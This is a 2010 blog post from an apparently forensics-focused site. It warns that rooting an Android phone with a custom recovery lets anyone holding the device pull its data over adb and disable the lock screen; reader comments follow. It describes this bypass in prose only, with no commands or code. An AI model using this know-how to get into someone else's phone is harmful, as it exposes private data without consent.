• The Risk of Rooting

    Posted on October 26, 2010 by Lee Whitfield in Technical Articles.

    If I were to say the name ‘Linus’ and your first reaction is ‘Torvalds’ then you are a monumental geek. You make me proud. If you thought ‘Peanuts’ then you’re still a geek, just not quite as serious a case.

    Linus, from the Peanuts comic strip, used to keep a tight grip of his security blanket. If anything ever happened to said blanket he would go, somewhat, off the deep end. He felt like his world was ending and that nothing could ever make the world feel safer.

    Passwords and keys are the grown-up versions of security blankets.

    We carry our phones everywhere, regardless of their content. Our phones may contain confidential emails, embarrassing pictures and videos (such as this one… http://www.youtube.com/watch?v=vT1CVFaNEbA), and they may even hold our deepest, darkest secrets; things that we would never want others to uncover. Thankfully we password protect our phones so that no-one else can find out. Sadly these security blankets can often have large holes.

    Typically, to gain access to an Android phone someone would need direct access to the phone, hope there was no passcode/pattern lock, and turn on USB Debugging in the settings. This allows the user to gain access to the the Android Development Bridge (adb). Once a user has access this part of your phone all bets are off as your device can then be exploited and all data be pulled down onto a computer. The easy way to stop this? Lock your phone so no one else can access the contents. It is very difficult to bypass a lock on an Android device, especially on devices using 2.0 and up. However, if you like to tinker with your phone, root it, and install custom firmware you are playing with fire.

    I rooted my phone a few weeks back so that I could get the Froyo upgrade (2.2) before T-Mobile got to it and took out all of the good stuff. I downloaded an exploit package that allowed me to easily replace the phone’s recovery image, making it possible to install a ‘cooked’ rom. After some experimentation I discovered that the new ‘recovery’ allowed me to gain adb access without ever booting into the operating system. In turn I was able to mount the ‘data’ portion of the phone and download all the contents to my computer. I then turned the phone back on and, viola, the lock screen appeared as if nothing had happened.

    Back at my computer I started to look at the extracted data. I found my text messages, phone logs, calendar items, email messages, facebook and twitter updates, internet history, and the list goes on. I was also able to find both the SSID and the key to any wireless network to which my phone had been associated. This not only meant that my own home network was potentially compromised, but my work network too! My whole life was laid bare for anyone to see, assuming they could get the phone away from me. Bad? Yes but not the end of the world because my private life really isn’t that interesting. However, if my phone bill suddenly tripled or quadrupled I could be in trouble!

    I found that turning off the screen lock is a straight forward process that takes only a couple of minutes once access to the phone has been established. Full access to my phone is there for anyone that can lay their hands on my phone, all because I rooted it. Yes, I was the weak link in the phone’s security, not Google. If I hadn’t rooted my phone then the process of retrieving the data becomes infinitely more difficult.

    The other difficulty is that locking your phone isn’t going to stop anyone from simply popping out the memory card and walking away with your photographs and videos. Android still doesn’t have a way of encrypting the memory card so that it can’t be used elsewhere. Another potential hole in the security blanket.

    What have a I done now? I’ve gone to the stock HTC Rom for my HTC Desire. This allows me to get the latest OS upgrades first and overwrites the modified recovery with the standard, non-adb, version. Would I recommend everyone else do the same? Its entirely up to you.

    Also, for those iPhone users laughing at the ‘poor security’ of Android phones take a look at the link below. I guarantee you’ll hold on to your iPhone a little tighter in the future. http://www.engadget.com/2010/10/25/ios-4-1-glitch-lets-you-bypass-lock-screen-to-access-phone-app/

3 Responsesso far.

  1. […] This post was mentioned on Twitter by sansforensics, Yiorgos Adamopoulos, Lee Whitfield, RogueUniversity, Cyber Informer and others. Cyber Informer said: The #Risk of Rooting: [#forensic4cast.com] If I were to say the name #Linus and your first reaction is Torvalds then… http://dlvr.it/7Z0yB […]

  2. david nardoni says:

    Lee,

    Great post, another thing is that Android 2.2 I believe allows you to now store your apps on the SD card. So if people are doing that, physical access could allow someone to pop out the sd card and walk off with the apps and their data. Also as I am sure you are aware of how there are tools to bypass the pass code on the iphone today. I am sure if there are not already there will be tools to bypass the passcode on android as well.

    The bypass on the iphone only gets you access to the contacts and recent phone calls which, could be great for Law Enforcement who just need a quick look at what calls have been made.

    Good security controls on mobile devices are only a thought at this point. They have yet to be born. We shall see if and how the materialize.

    Great post!

    Dave Nardoni

  3. […] the digital forensics industry, a good example of this was Lee Whitfield’s post about the dangers of rooting one’s smartphone. Lee linked to an article that contained — guess […]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.